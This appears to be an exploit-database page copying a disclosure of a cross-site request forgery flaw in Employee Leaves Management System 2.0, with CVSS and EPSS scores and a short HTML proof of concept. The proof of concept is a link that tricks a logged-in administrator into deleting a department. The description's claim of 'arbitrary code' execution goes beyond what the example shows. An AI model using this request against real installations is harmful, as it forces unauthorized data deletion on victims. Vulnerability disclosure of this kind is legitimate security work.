Advertisement






Employee Leaves Management System 2.0 Cross Site Request Forgery

CVE Category Price Severity
N/A CWE-352 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2020-01-27
CPE
cpe:cpe:/a:employee-leaves-management-system:2.0
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010204

Below is a copy:

Employee Leaves Management System 2.0 Cross Site Request Forgery
# Exploit Title: Employee Leaves Management System 2.0 Cross-Site Request
Forgery
# Date: 22-01-2020
# Author: Priyanka Samak
# Vendor Homepage: https://phpgurukul.com/
# Software Link:
https://phpgurukul.com/employee-leaves-management-system-elms/
# Software: Employee Leaves Management System
# Version : 2.0
# Tested on Windows 10
# Vulnerability Type: Cross-Site Request Forgery
#Cross-site Request Forgery is an attack whereby an attacker tricks a
victim into performing actions on their behalf.
#*1. Description*
#The vulnerability exists due to failure in the "/managedepartments.php"
script to properly verify the source of HTTP request.
#This Cross-Site Request Forgery (CSRF) allows an attacker to execute
arbitrary code by sending a malicious request to a logged-in user.
#*2. Proof of Concept:* This example sends HTTP GET crafted request in
order to delete the specified department.
<html>
<body
<button class="button"><a href="
http://localhost/elms/admin/managedepartments.php?del=6">Click Me!</button>
</body>
</html>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.